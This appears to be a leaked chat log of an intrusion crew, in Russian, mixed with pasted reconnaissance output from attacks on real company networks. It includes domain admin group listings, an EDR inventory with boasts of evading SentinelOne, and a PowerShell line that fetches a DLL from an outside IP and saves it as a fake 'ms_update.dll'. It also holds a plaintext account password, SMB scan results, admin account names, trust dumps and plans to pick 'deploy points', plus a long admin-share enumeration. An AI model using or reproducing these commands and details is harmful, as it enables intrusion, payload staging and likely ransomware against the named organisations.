HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
``````
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
TENGSERV UREJA USCHIPWA001
USCHIPWD001 USCHIPWW001
```сюда сообщения продублируйтеберидаже 2в кобе есть сессия?кобахотя нетзайди в тпшждидаlfесть там еще че?грустноушел в оффсейчас посмотрюсесия сдохлада и вебрут вроде тоже..сентинел нам не помеха) проверено)работаемнуусентинел))EDR
```
====== AntiVirus ======
Engine: Sentinel Agent
ProductEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelRemediation.exe
ReportingEXE : C:\Program Files\SentinelOne\Sentinel Agent 4.2.4.154\SentinelAgent.exe
Engine : Windows Defender
ProductEXE : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine: Webroot SecureAnywhere
ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
``ДК
` THFDC01 10.254.191.10`ЛА
```
Admin
Administrator
CDKLocalAdm
TOMHOLZERFORD\Domain Admins
The command completed successfully.
```ЕА
```
Administrator CDKAdmin CDKPCADMIN
ProfWiz THFAdmin
``ДА
```
Administrator CDKAdmin CDKPCADMIN
ProfWiz THFAdmin
```но ни системы, ни ЛА пока нетнет, на пару вдсок залезлинашли ДА?```
(New-Object System.Net.WebClient).DownloadFile('http://104.243.44.69:8080/Um8r3114/x64.dll', 'C:\Windows\Temp\ms_update.dll')
```J$13Yr18``
>sAMAccountName: flshc
>description: Generic Login ID for Fletcher Shipping Clerks (2 COMPUTERS). Generic Novell Password=flshc09 (zero,nine)
``````
[+] 170.7.180.21:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78229W7E64) (domain:WILSONART)
[170.7.12.16:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:73183W7P) (domain:WILSONART)
[170.7.180.26:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78209W7E64) (domain:WILSONART)
[+] 170.7.180.83:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78211W7E64) (domain:WILSONART)
[+] 170.7.54.81:445 - Host is running Windows XP SP3 (language:English) (name:FAMIXXP) (domain:WILSONART)
[+] 170.7.76.113:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS1) (domain:WILSONART)
[+] 170.7.123.169:445 - Host is running Windows XP SP3 (language:English) (name:73324XP) (domain:WILSONART)
[+] 170.7.160.14:445 - Host is running Windows XP SP3 (language:English) (name:71919XP) (domain:WILSONART)
[+] 170.7.76.11:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP1) (domain:WILSONART)
[170.7.12.114:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74023W7P) (domain:WILSONART)
[+] 170.7.54.63:445 - Host is running Windows XP SP3 (language:English) (name:ORACLEXP2) (domain:WILSONART)
[+] 170.7.76.114:445 - Host is running Windows XP SP3 (language:English) (name:VYOMLABS2) (domain:WILSONART)
[170.7.8.19:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:74858W7P) (domain:WILSONART)
[+] 170.7.120.13:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77857W7P) (domain:WILSONART)
[+] 170.7.54.72:445 - Host is running Windows XP SP3 (language:English) (name:XPTEST1) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[+] 170.7.170.194:445 - Host is running Windows XP SP3 (language:English) (name:73347XP) (domain:WILSONART)
[+] 170.7.120.93:445 - Host is running Windows XP SP3 (language:English) (name:73657XP) (domain:WILSONART)
[+] 170.7.5.252:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS02) (domain:WILSONART)
[+] 170.7.171.225:445 - Host is running Windows XP SP3 (language:English) (name:73682XP) (domain:WILSONART)
[+] 170.7.5.251:445 - Host is running Windows XP SP3 (language:English) (name:EDIWS01) (domain:WILSONART)
[+] 170.7.121.51:445 - Host is running Windows XP SP3 (language:English) (name:73206XP) (domain:WILSONART)
[+] 170.7.160.78:445 - Host is running Windows XP SP3 (language:English) (name:73844XP) (domain:WILSONART)
[+] 170.7.121.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77212W7P) (domain:WILSONART)
[170.7.120.165:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:78066W7P) (domain:WILSONART)
[+] 170.7.12.33:445 - Host is running Windows XP SP3 (language:English) (name:72697XP) (domain:WILSONART)
[+] 170.7.159.17:445 - Host is running Windows XP SP3 (language:English) (name:73935XP) (domain:WILSONART)
[+] 170.7.181.242:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77217W7P) (domain:WILSONART)
[+] 170.7.180.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77374W7P) (domain:WILSONART)
[+] 170.7.12.205:445 - Host is running Windows XP SP3 (language:English) (name:76216XP) (domain:WILSONART)
[170.7.180.18:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:77850W7P) (domain:WILSONART)
[+] 170.7.122.115:445 - Host is running Windows XP SP3 (language:English) (name:76291XP) (domain:WILSONART)
[+] 170.7.180.82:445 - Host is running Windows 7 Enterprise SP1 (build:7601) (name:78208W7E64) (domain:WILSONART)
[+] 170.7.182.47:445 - Host is running Windows XP SP3 (language:English) (name:73938XP) (domain:WILSONART)
```.```
>sAMAccountName: Administrator
>sAMAccountName: kronosadmin
>sAMAccountName: cognosadmin
>sAMAccountName: ediadmin
>sAMAccountName: polyreyadmin
>sAMAccountName: itco365admin
>sAMAccountName: itco365admin2
>sAMAccountName: hfmadmin
>sAMAccountName: dcdevdb2admin
>sAMAccountName: gcdadmin
>sAMAccountName: p8admin
>sAMAccountName: dcadmin
>sAMAccountName: dcqadb2admin
>sAMAccountName: dcproddb2admin
>sAMAccountName: p8prodadmin
>sAMAccountName: dcprodadmin
>sAMAccountName: dsiadmin
>sAMAccountName: dsiadmin1
>sAMAccountName: dsiadmin2
>sAMAccountName: waitadmin
>sAMAccountName: admindsi
``ну значит выбраться надо только в карантиныгде-то не пингуется дажегде-то снялк этим я обращалсяcn.Wilsonart.com
ralphwilcon.com
uk.Wilsonart.com
polyrey.com
resopal.ger
arborite.com
eu.Wilsonart.comкак к разным?ну ты прямо так к ним обращался?ну, получается они снятыага, вижуэто какая-то кривотень, да, но это разные домены с одним названием``
trustdmp.txt:31: dn:CN=Wilsonart.com,CN=System,DC=cn,DC=Wilsonart,DC=com
trustdmp.txt:49: dn:CN=Wilsonart.com,CN=System,DC=ralphwilson,DC=com
trustdmp.txt:67: dn:CN=Wilsonart.com,CN=System,DC=uk,DC=Wilsonart,DC=com
trustdmp.txt:85: dn:CN=Wilsonart.com,CN=System,DC=polyrey,DC=com
trustdmp.txt:112: dn:CN=Wilsonart.com,CN=System,DC=resopal,DC=ger
trustdmp.txt:130: dn:CN=Wilsonart.com,CN=System,DC=arborite,DC=com
trustdmp.txt:148: dn:CN=Wilsonart.com,CN=System,DC=eu,DC=Wilsonart,DC=com
Found 7 matches for "CN=Wilsonart.com".
``обрати вниманиеон не повторяетсянет пока увыне сбрутились случайно?как там с ними кстати обстоит вопрос?+ с текущего керб естьотуда снял ад_инфо и кербывсего 7 трастов получилосьу них текущий домен в трастах повторяется много разтам все трастывыше лежит архиви для каждой групы выберем единую точку деплоятаким образом мы "сгрупируем" трасты между собойчто и требуется проверитьвероятнее всего они между собой законтачены на полную видимостьобратите внимание на подобные записи
dn:CN=slf.local,CN=System,DC=Wilsonart,DC=com
dn:CN=slf.local,CN=System,DC=uk,DC=Wilsonart,DC=com28 трастов это просто плохая организация сети и не более, пугаться не стоити будем выбирать соответствующие точки откуда пойдет раскидкагоспода, снимайте составы всех доменовuser4`hyperion_service`
```
\\78186W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78186W7P.Wilsonart.com\C$ - Default share
\\78186W7P.Wilsonart.com\IPC$ - Remote IPC
\\ED79161W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79161W10P.Wilsonart.com\C$ - Default share
\\ED79161W10P.Wilsonart.com\IPC$ - Remote IPC
\\79337W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79337W10P64.Wilsonart.com\C$ - Default share
\\79337W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78192W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78192W7P.Wilsonart.com\C$ - Default share
\\78192W7P.Wilsonart.com\IPC$ - Remote IPC
\\78204W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78204W7P.Wilsonart.com\C$ - Default share
\\78204W7P.Wilsonart.com\IPC$ - Remote IPC
\\79220W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79220W10P.Wilsonart.com\C$ - Default share
\\79220W10P.Wilsonart.com\IPC$ - Remote IPC
\\73932W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73932W7P.Wilsonart.com\C$ - Default share
\\73932W7P.Wilsonart.com\IPC$ - Remote IPC
\\76869W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\76869W7P.Wilsonart.com\C$ - Default share
\\76869W7P.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS25.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS25.Wilsonart.com\C$ - Default share
\\DCWAS25.Wilsonart.com\F$ - Default share
\\DCWAS25.Wilsonart.com\IPC$ - Remote IPC
\\DEVBIOBI.Wilsonart.com\ADMIN$ - Remote Admin
\\DEVBIOBI.Wilsonart.com\Backups -
\\DEVBIOBI.Wilsonart.com\BackupScripts -
\\DEVBIOBI.Wilsonart.com\BIAPPSProjects -
\\DEVBIOBI.Wilsonart.com\C$ - Default share
\\DEVBIOBI.Wilsonart.com\D$ - Default share
\\DEVBIOBI.Wilsonart.com\IPC$ - Remote IPC
\\DEVBIOBI.Wilsonart.com\OBIEE -
\\DEVBIOBI.Wilsonart.com\temp -
\\EL79470W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79470W10P64.Wilsonart.com\C$ - Default share
\\EL79470W10P64.Wilsonart.com\IPC$ - Remote IPC
\\79196W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79196W10P.Wilsonart.com\C$ - Default share
\\79196W10P.Wilsonart.com\IPC$ - Remote IPC
\\74617W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74617W7P.Wilsonart.com\C$ - Default share
\\74617W7P.Wilsonart.com\D$ - Default share
\\74617W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL80143W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL80143W10P64.Wilsonart.com\C$ - Default share
\\EL80143W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78486W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78486W10P.Wilsonart.com\C$ - Default share
\\78486W10P.Wilsonart.com\IPC$ - Remote IPC
\\74496W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74496W7P.Wilsonart.com\B$ - Default share
\\74496W7P.Wilsonart.com\C$ - Default share
\\74496W7P.Wilsonart.com\E$ - Default share
\\74496W7P.Wilsonart.com\IPC$ - Remote IPC
\\79855W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79855W10P64.Wilsonart.com\C$ - Default share
\\79855W10P64.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS84.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS84.Wilsonart.com\C$ - Default share
\\DCWAS84.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS84.Wilsonart.com\Test -
\\VyomLabs4.Wilsonart.com\ADMIN$ - Remote Admin
\\VyomLabs4.Wilsonart.com\C$ - Default share
\\VyomLabs4.Wilsonart.com\IPC$ - Remote IPC
\\HQTAS73.Wilsonart.com\ADMIN$ - Remote Admin
\\HQTAS73.Wilsonart.com\C$ - Default share
\\HQTAS73.Wilsonart.com\D$ - Default share
\\HQTAS73.Wilsonart.com\F9Data -
\\HQTAS73.Wilsonart.com\infor -
\\HQTAS73.Wilsonart.com\IPC$ - Remote IPC
\\HQTAS73.Wilsonart.com\tempinstall -
\\HQTAS73.Wilsonart.com\test -
\\79127W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79127W10P.Wilsonart.com\C$ - Default share
\\79127W10P.Wilsonart.com\IPC$ - Remote IPC
\\78722W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\78722W7P64.Wilsonart.com\C$ - Default share
\\78722W7P64.Wilsonart.com\IPC$ - Remote IPC
\\73339W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73339W7P.Wilsonart.com\C$ - Default share
\\73339W7P.Wilsonart.com\IPC$ - Remote IPC
\\74211W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74211W7P.Wilsonart.com\B$ - Default share
\\74211W7P.Wilsonart.com\C$ - Default share
\\74211W7P.Wilsonart.com\IPC$ - Remote IPC
\\78229W7E64.Wilsonart.com\ADMIN$ - Remote Admin
\\78229W7E64.Wilsonart.com\C$ - Default share
\\78229W7E64.Wilsonart.com\IPC$ - Remote IPC
\\77831W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77831W7P.Wilsonart.com\C$ - Default share
\\77831W7P.Wilsonart.com\IPC$ - Remote IPC
\\73368W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73368W7P.Wilsonart.com\C$ - Default share
\\73368W7P.Wilsonart.com\E$ - Default share
\\73368W7P.Wilsonart.com\IPC$ - Remote IPC
\\TNTAS08.Wilsonart.com\ADMIN$ - Remote Admin
\\TNTAS08.Wilsonart.com\C$ - Default share
\\TNTAS08.Wilsonart.com\Extract -
\\TNTAS08.Wilsonart.com\HP Officejet Pro K550 Series
\\TNTAS08.Wilsonart.com\IPC$ - Remote IPC
\\TNTAS08.Wilsonart.com\print$ - Printer Drivers
\\TNTAS08.Wilsonart.com\Ricoh Aficio MP C2500 PCL6
\\TNTAS08.Wilsonart.com\Users -
\\ED79126W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79126W10P.Wilsonart.com\C$ - Default share
\\ED79126W10P.Wilsonart.com\IPC$ - Remote IPC
\\73747W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73747W7P.Wilsonart.com\C$ - Default share
\\73747W7P.Wilsonart.com\IPC$ - Remote IPC
\\73747W7P.Wilsonart.com\print$ - Printer Drivers
\\DRWAS07.Wilsonart.com\ADMIN$ - Remote Admin
\\DRWAS07.Wilsonart.com\C$ - Default share
\\DRWAS07.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS39.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS39.Wilsonart.com\C$ - Default share
\\DCWAS39.Wilsonart.com\D$ - Default share
\\DCWAS39.Wilsonart.com\IPC$ - Remote IPC
\\74172W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74172W7P.Wilsonart.com\B$ - Default share
\\74172W7P.Wilsonart.com\C$ - Default share
\\74172W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIWEB.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIWEB.Wilsonart.com\C$ - Default share
\\QABIWEB.Wilsonart.com\D$ - Default share
\\QABIWEB.Wilsonart.com\IPC$ - Remote IPC
\\QABIWEB.Wilsonart.com\Software -
\\EL76306W7E.Wilsonart.com\ADMIN$ - Remote Admin
\\EL76306W7E.Wilsonart.com\C$ - Default share
\\EL76306W7E.Wilsonart.com\IPC$ - Remote IPC
\\79146W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79146W10P.Wilsonart.com\C$ - Default share
\\79146W10P.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS98.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS98.Wilsonart.com\C$ - Default share
\\DCWAS98.Wilsonart.com\IPC$ - Remote IPC
\\QABIPLN.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIPLN.Wilsonart.com\C$ - Default share
\\QABIPLN.Wilsonart.com\D$ - Default share
\\QABIPLN.Wilsonart.com\IPC$ - Remote IPC
\\QABIPLN.Wilsonart.com\Software -
\\77374W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77374W7P.Wilsonart.com\C$ - Default share
\\77374W7P.Wilsonart.com\IPC$ - Remote IPC
\\74081W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74081W7P.Wilsonart.com\C$ - Default share
\\74081W7P.Wilsonart.com\IPC$ - Remote IPC
\\74081W7P.Wilsonart.com\print$ - Printer Drivers
\\74081W7P.Wilsonart.com\RICOH MP 2554 PCL 6
\\DT03W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\DT03W7P64.Wilsonart.com\C$ - Default share
\\DT03W7P64.Wilsonart.com\IPC$ - Remote IPC
\\73313W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73313W7P.Wilsonart.com\B$ - Default share
\\73313W7P.Wilsonart.com\C$ - Default share
\\73313W7P.Wilsonart.com\IPC$ - Remote IPC
\\78172W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78172W10P.Wilsonart.com\C$ - Default share
\\78172W10P.Wilsonart.com\IPC$ - Remote IPC
\\HeathDesktop.Wilsonart.com\ADMIN$ - Remote Admin
\\HeathDesktop.Wilsonart.com\C$ - Default share
\\HeathDesktop.Wilsonart.com\IPC$ - Remote IPC
\\EL79448W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79448W10P.Wilsonart.com\C$ - Default share
\\EL79448W10P.Wilsonart.com\IPC$ - Remote IPC
\\77953W7E32.Wilsonart.com\ADMIN$ - Remote Admin
\\77953W7E32.Wilsonart.com\C$ - Default share
\\77953W7E32.Wilsonart.com\IPC$ - Remote IPC
\\75516W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75516W7P.Wilsonart.com\C$ - Default share
\\75516W7P.Wilsonart.com\IPC$ - Remote IPC
\\77956W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77956W7P.Wilsonart.com\C$ - Default share
\\77956W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIESS.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIESS.Wilsonart.com\C$ - Default share
\\QABIESS.Wilsonart.com\D$ - Default share
\\QABIESS.Wilsonart.com\data -
\\QABIESS.Wilsonart.com\IPC$ - Remote IPC
\\77830W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77830W7P.Wilsonart.com\C$ - Default share
\\77830W7P.Wilsonart.com\IPC$ - Remote IPC
\\77830W7P.Wilsonart.com\print$ - Printer Drivers
\\77830W7P.Wilsonart.com\test zebra printer
\\DCWAS03.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS03.Wilsonart.com\C$ - Default share
\\DCWAS03.Wilsonart.com\D$ - Default share
\\DCWAS03.Wilsonart.com\E$ - Default share
\\DCWAS03.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS03.Wilsonart.com\NxT$ -
\\DCWAS03.Wilsonart.com\NxTDeve$ -
\\DCWAS03.Wilsonart.com\NxTPyqa$ -
\\DCWAS03.Wilsonart.com\NxTTest$ -
\\73346W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73346W7P.Wilsonart.com\C$ - Default share
\\73346W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL79469W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\EL79469W10P.Wilsonart.com\C$ - Default share
\\EL79469W10P.Wilsonart.com\IPC$ - Remote IPC
\\74494W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74494W7P.Wilsonart.com\B$ - Default share
\\74494W7P.Wilsonart.com\C$ - Default share
\\74494W7P.Wilsonart.com\IPC$ - Remote IPC
\\78070W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78070W7P.Wilsonart.com\C$ - Default share
\\78070W7P.Wilsonart.com\IPC$ - Remote IPC
\\74205W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74205W7P.Wilsonart.com\B$ - Default share
\\74205W7P.Wilsonart.com\C$ - Default share
\\74205W7P.Wilsonart.com\IPC$ - Remote IPC
\\74015W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74015W7P.Wilsonart.com\C$ - Default share
\\74015W7P.Wilsonart.com\IPC$ - Remote IPC
\\74015W7P.Wilsonart.com\print$ - Printer Drivers
\\77195W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\77195W7P.Wilsonart.com\C$ - Default share
\\77195W7P.Wilsonart.com\IPC$ - Remote IPC
\\78210W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78210W7P.Wilsonart.com\C$ - Default share
\\78210W7P.Wilsonart.com\IPC$ - Remote IPC
\\76801W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\76801W7P.Wilsonart.com\C$ - Default share
\\76801W7P.Wilsonart.com\IPC$ - Remote IPC
\\79151W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79151W10P.Wilsonart.com\C$ - Default share
\\79151W10P.Wilsonart.com\IPC$ - Remote IPC
\\ITWDS02.Wilsonart.com\ADMIN$ - Remote Admin
\\ITWDS02.Wilsonart.com\C$ - Default share
\\ITWDS02.Wilsonart.com\D$ - Default share
\\ITWDS02.Wilsonart.com\DeploymentShare$ -
\\ITWDS02.Wilsonart.com\IPC$ - Remote IPC
\\ITWDS02.Wilsonart.com\REMINST - Windows Deployment Services Share
\\ITWDS02.Wilsonart.com\Users -
\\79904W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\79904W10P64.Wilsonart.com\C$ - Default share
\\79904W10P64.Wilsonart.com\IPC$ - Remote IPC
\\74181W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\74181W7P.Wilsonart.com\C$ - Default share
\\74181W7P.Wilsonart.com\D$ - Default share
\\74181W7P.Wilsonart.com\IPC$ - Remote IPC
\\74181W7P.Wilsonart.com\X$ - Default share
\\79192W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79192W10P.Wilsonart.com\C$ - Default share
\\79192W10P.Wilsonart.com\IPC$ - Remote IPC
\\77403W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\77403W10P.Wilsonart.com\C$ - Default share
\\77403W10P.Wilsonart.com\IPC$ - Remote IPC
\\78715W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\78715W10P.Wilsonart.com\C$ - Default share
\\78715W10P.Wilsonart.com\IPC$ - Remote IPC
\\78715W10P.Wilsonart.com\print$ - Printer Drivers
\\78715W10P.Wilsonart.com\RICOH MP C3503
\\UKWAS01.Wilsonart.com\ADMIN$ - Remote Admin
\\UKWAS01.Wilsonart.com\C$ - Default share
\\UKWAS01.Wilsonart.com\IPC$ - Remote IPC
\\UKWAS01.Wilsonart.com\NETLOGON - Logon server share
\\UKWAS01.Wilsonart.com\SYSVOL - Logon server share
\\UKWAS01.Wilsonart.com\test -
\\L79009W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\L79009W10P.Wilsonart.com\C$ - Default share
\\L79009W10P.Wilsonart.com\IPC$ - Remote IPC
\\73689W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73689W7P.Wilsonart.com\C$ - Default share
\\73689W7P.Wilsonart.com\IPC$ - Remote IPC
\\73923W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73923W7P.Wilsonart.com\C$ - Default share
\\73923W7P.Wilsonart.com\IPC$ - Remote IPC
\\79214W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\79214W10P.Wilsonart.com\C$ - Default share
\\79214W10P.Wilsonart.com\IPC$ - Remote IPC
\\DCVEEAM02.Wilsonart.com\ADMIN$ - Remote Admin
\\DCVEEAM02.Wilsonart.com\C$ - Default share
\\DCVEEAM02.Wilsonart.com\E$ - Default share
\\DCVEEAM02.Wilsonart.com\F$ - Default share
\\DCVEEAM02.Wilsonart.com\G$ - Default share
\\DCVEEAM02.Wilsonart.com\H$ - Default share
\\DCVEEAM02.Wilsonart.com\I$ - Default share
\\DCVEEAM02.Wilsonart.com\IPC$ - Remote IPC
\\DCVEEAM02.Wilsonart.com\J$ - Default share
\\DCVEEAM02.Wilsonart.com\K$ - Default share
\\DCVEEAM02.Wilsonart.com\L$ - Default share
\\DCVEEAM02.Wilsonart.com\M$ - Default share
\\DCVEEAM02.Wilsonart.com\N$ - Default share
\\DCVEEAM02.Wilsonart.com\O$ - Default share
\\DCVEEAM02.Wilsonart.com\P$ - Default share
\\ED79160W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\ED79160W10P.Wilsonart.com\C$ - Default share
\\ED79160W10P.Wilsonart.com\IPC$ - Remote IPC
\\76406W7E64.Wilsonart.com\ADMIN$ - Remote Admin
\\76406W7E64.Wilsonart.com\C$ - Default share
\\76406W7E64.Wilsonart.com\IPC$ - Remote IPC
\\73860W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\73860W7P.Wilsonart.com\C$ - Default share
\\73860W7P.Wilsonart.com\IPC$ - Remote IPC
\\dcwas88.Wilsonart.com\ADMIN$ - Remote Admin
\\dcwas88.Wilsonart.com\C$ - Default share
\\dcwas88.Wilsonart.com\D$ - Default share
\\dcwas88.Wilsonart.com\E$ - Default share
\\dcwas88.Wilsonart.com\IPC$ - Remote IPC
\\dcwas88.Wilsonart.com\print$ - Printer Drivers
\\ES79799W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\ES79799W10P64.Wilsonart.com\C$ - Default share
\\ES79799W10P64.Wilsonart.com\IPC$ - Remote IPC
\\78179W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78179W7P.Wilsonart.com\C$ - Default share
\\78179W7P.Wilsonart.com\IPC$ - Remote IPC
\\75537W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75537W7P.Wilsonart.com\C -
\\75537W7P.Wilsonart.com\C$ - Default share
\\75537W7P.Wilsonart.com\HP LJ300-400 color M351-M451 PCL 6 (Copy 1)
\\75537W7P.Wilsonart.com\IPC$ - Remote IPC
\\75537W7P.Wilsonart.com\print$ - Printer Drivers
\\76032W10E.Wilsonart.com\ADMIN$ - Remote Admin
\\76032W10E.Wilsonart.com\C$ - Default share
\\76032W10E.Wilsonart.com\D$ - Default share
\\76032W10E.Wilsonart.com\Downloads -
\\76032W10E.Wilsonart.com\E$ - Default share
\\76032W10E.Wilsonart.com\F$ - Default share
\\76032W10E.Wilsonart.com\IPC$ - Remote IPC
\\76032W10E.Wilsonart.com\ISOs -
\\76032W10E.Wilsonart.com\print$ - Printer Drivers
\\76032W10E.Wilsonart.com\Users -
\\76032W10E.Wilsonart.com\VMShare -
\\75574W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\75574W7P.Wilsonart.com\C$ - Default share
\\75574W7P.Wilsonart.com\IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com\ADMIN$ - Remote Admin
\\QABIHFM.Wilsonart.com\C$ - Default share
\\QABIHFM.Wilsonart.com\D$ - Default share
\\QABIHFM.Wilsonart.com\data -
\\QABIHFM.Wilsonart.com\FDMEE -
\\QABIHFM.Wilsonart.com\IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com\ODI_Migrations -
\\DCWAS09.Wilsonart.com\ADMIN$ - Remote Admin
\\DCWAS09.Wilsonart.com\C$ - Default share
\\DCWAS09.Wilsonart.com\F$ - Default share
\\DCWAS09.Wilsonart.com\IPC$ - Remote IPC
\\DCWAS09.Wilsonart.com\print$ - Printer Drivers
\\DCWAS09.Wilsonart.com\RicohSecurePrint - Ricoh Secure Print
\\EL77610W10E.Wilsonart.com\ADMIN$ - Remote Admin
\\EL77610W10E.Wilsonart.com\C$ - Default share
\\EL77610W10E.Wilsonart.com\IPC$ - Remote IPC
\\PRDBITAB.Wilsonart.com\ADMIN$ - Remote Admin
\\PRDBITAB.Wilsonart.com\Backups -
\\PRDBITAB.Wilsonart.com\C$ - Default share
\\PRDBITAB.Wilsonart.com\D$ - Default share
\\PRDBITAB.Wilsonart.com\Essbase_Extract_for_Tableau -
\\PRDBITAB.Wilsonart.com\IPC$ - Remote IPC
\\78220W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78220W7P.Wilsonart.com\C$ - Default share
\\78220W7P.Wilsonart.com\IPC$ - Remote IPC
\\EL80150W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\\EL80150W10P64.Wilsonart.com\C$ - Default share
\\EL80150W10P64.Wilsonart.com\IPC$ - Remote IPC
\\EL80150W10P64.Wilsonart.com\print$ - Printer Drivers
\\LWDA-DC.Wilsonart.com\Accounting -
\\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin
\\LWDA-DC.Wilsonart.com\C$ - Default share
\\LWDA-DC.Wilsonart.com\CADCode -
\\LWDA-DC.Wilsonart.com\D$ - Default share
\\LWDA-DC.Wilsonart.com\DallasFiles -
\\LWDA-DC.Wilsonart.com\DallasManagerFiles -
\\LWDA-DC.Wilsonart.com\E$ - Default share
\\LWDA-DC.Wilsonart.com\IPC$ - Remote IPC
\\LWDA-DC.Wilsonart.com\morbi -
\\LWDA-DC.Wilsonart.com\Scans -
\\LWDA-DC.Wilsonart.com\Schedule -
\\78167W7P.Wilsonart.com\ADMIN$ - Remote Admin
